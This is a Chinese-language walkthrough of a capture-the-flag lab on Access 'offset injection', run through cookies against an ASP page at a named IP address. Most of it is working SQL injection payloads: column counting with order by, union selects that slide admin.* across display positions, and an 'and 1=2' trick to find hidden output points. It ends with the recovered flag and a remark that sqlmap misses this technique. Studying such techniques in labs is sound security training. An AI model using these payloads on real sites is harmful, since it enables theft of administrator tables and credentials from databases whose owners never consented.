Access注入--偏移注入

 

 

                                        Access注入--偏移注入

 

Access偏移注入:知道表名,不知道字段名.

核心:        tables_name.*

 

 

题目:http://59.63.200.79:8004/

 

1.http://59.63.200.79:8004/ProductShow.asp?id=104

#去除id=104,通过cookie传参

#http://59.63.200.79:8004/ProductShow.asp?

 

2.document.cookie="id="+escape("100")

#页面有变化,存在注入

 

3.document.cookie="id="+escape("100 order by 26")

#查询字段个数 26个

 

4.document.cookie="id="+escape("104 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from admin")

#26个字段是页面当前表的字段数,不是admin表的字段数.admin表中的字段数不能超过26.

#爆出显位 3,5,7 ;

#还可能有其他显位没有爆出.

       tips:

       在1~26数字后面加上00000,再执行,通过返回的HTML代码,搜索00000,查出显位点.

 

5.判断admin.*有几个字段

 document.cookie="id="+escape("104 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,admin.* from admin")

#一直删,删到10处没有报错.

document.cookie="id="+escape("104 union select 1,2,3,4,5,6,7,8,9,10,admin.* from admin")

=> 26-10 = 16        

=> 所有admin表有16个字段.

 

6. document.cookie="id="+escape("104 union select 1,2,3,4,5,6,admin.*,23,24,25,26 from admin")

# 7号位得到数据1,说明admin表第一个字段输出的值为1,继续往前推.

7. document.cookie="id="+escape("104 union select 1,2,3,4,5,admin.*,22,23,24,25,26 from admin")

# 7号位得到数据admin,说明admin表第二个字段输出的值为admin,继续往前推.

8. document.cookie="id="+escape("104 union select admin.*,17,18,19,20,21,22,23,24,25,26 from admin")                        

#推到1时,发现没有出现flag,寻找是否有隐藏输出点.

 

9. document.cookie="id="+escape("100 union select 100000,200000,300000,400000,500000,600000,700000,800000,900000,1000000

,1100000,1200000,1300000,1400000,1500000,1600000,1700000,1800000,1900000,2000000,2100000,2200000,2300000,2400000,2500000,2600000 from admin")

#发现页面显示正常,因为数据库默认排序从小到大,将id=100的数据显示了出来,所以页面正常.

#解决: and 1=2

10. document.cookie="id="+escape("100 and 1=2 union select 100000,200000,300000,400000,500000,600000,700000,800000,900000,1000000

,1100000,1200000,1300000,1400000,1500000,1600000,1700000,1800000,1900000,2000000,2100000,2200000,2300000,2400000,2500000,2600000 from admin")

#爆出显位 300000,500000,700000 ;

#右键查看源码,Ctrl+F,搜索00000,发现2500000,25也是输出点

 

11. document.cookie="id="+escape("104 union select 1,2,3,4,5,6,7,8,9,admin.*,26 from admin")

#进过不断平移,发现flag在admin表的最后一个字段.

#右键查看源码,找到flag值:zkaq{f0e12dafb6}

 

偏移注入 sqlmap 无法扫出

 

惯例:不精准

asp        Access

       aspx      mssql

       php        mysql

       jsp         oracle